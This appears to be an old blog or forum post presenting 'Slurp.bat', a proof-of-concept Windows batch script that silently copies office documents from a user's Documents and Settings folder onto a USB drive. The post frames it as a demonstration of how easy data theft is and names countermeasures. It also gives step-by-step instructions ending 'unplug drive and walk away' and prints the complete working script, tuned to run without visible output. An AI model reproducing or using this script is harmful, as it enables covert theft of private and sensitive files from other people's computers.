podslurp script

Slurp.bat
by Ravi Mohan

Purpose:
To create a simple proof-of-concept application that searches for office documents and copies them from a Windows computer to any removable storage device).
The point of this exercise is to demonstrate (qualitatively) how easy it is to carry out data theft with removable storage devices.

Method:

I utilised the Xcopy command with silent and recusive options for each filetype in a hardcoded target directory. i also suppressed any messages by piping the output to a standard text file that is deleted at the end of the process.The real purpose of the batch file is a one click implimentation of the use of the command, over multiple filetypes, as well as to not have any "obvious" output on the shell. *click* *click* is less obvious than *typetypetypetype* after all

The most interesting thing about this is that all components used for this function exactly as they are designed to, and there is no real 'exploit' other than at the social level (IE getting access to a system with malicious intent).

i'd note this version was optimised for silent running and not reliability(and there's one situation that will hang up the download of files w/o any warning since all warnings are redirected... try to find it ). some small tweaks to the batch script would add some logging capabilities but i leave that as a (terribily simple) excercise to the reader.It also searches for each filetype recusively and with addition to the time to copy, i suspect adding more filetypes would increase download time.

Anyone who understands whats being done could *easily* do this (took me 2 hours to perfect, mainly due to rusty dos skills, and trying to get it *totally*silent), but i strongly discourage usage of such this script or similar tool, for illegal activitiesIt IS however a very vivid demonstration of how easy it is to steal data, since anyone with a moderate knowledge of windows command line could easily cook up a similar batch file. I personally made extensibve use of the help function in producing it too!

tests:
The method was tested on a stock copy of windows XP SP2 on a packard bell Easynote R1938 with 1.6 GHZ processor, 1 GB ram, and using USB 2.0 drives. The version of windows, fully patched in both admin and LUA. There wasn't any noticable performance difference between USB/IDE drives and USB flash drives, though the amount of files on my system (~4 MB) was not large

results:
all files of target types in user directory were copied

howto
1) copy the slurp.bat file to your storage device (preferably off the target system)
2)create the "slurp" folder (your free to change the name...but you'll need to edit the relavant parts of the script )
3)run slurp.bat
4)a blank black window will open, and when the transfer is done, will close.
5)unplug drive and walk away

future enhancements:
see if its possible to speed it up
test on a systemwide scale as opposed to /user/ folder
check for traces left behind
see if i can get multiple filetypes in one line
dedicated programme for the job (though this setup is simpler and more powerful)

possible countermeasures:
possibly disable use of USB drives on systems with sensitive data
common sense

acknowledgements Abe Usher @ http://www.sharp-ideas.net, whose slurp-audit made me wonder if it was as easy as i thought it was. Its a better tool for security work probably than this, since it dosen't actually carry out the nasty bit of the process.

the actual script

@echo off
rem slurp file copying script by faileas
rem for educational purposes only, since its so bloody simple any way, anyone with dos skills could work it out
rem notes:slurp assumes you have the correct directories created in the target drive. read and understand the commands!
rem slurp will find and download the filetypes listed.i don't think its 100% efficient timewise,
rem but its simple enough to memorise. The pipe out to empty.txt supresses console massages, but might not always be necessary
rem for additional options try help Xcopy
(edit the second line with the empty.txt should NOT wrap and belongs to the earlier lines)
@echo off
xcopy "c:\Documents and Settings"\*.doc \slurp\ /s /Q /y >empty.txt
xcopy "c:\Documents and Settings"\*.xls \slurp\ /s /Q /c /y > empty.txt
xcopy "c:\Documents and Settings"\*.pdf \slurp\ /s /Q /c /y > empty.txt
xcopy "c:\Documents and Settings"\*.rtf \slurp\ /s /Q /c /y> empty.txt
xcopy "c:\Documents and Settings"\*.txt \slurp\ /s /Q /c /y> empty.txt
xcopy "c:\Documents and Settings"\*.ppt \slurp\ /s /q /c /y > empty.txt
del empty.txt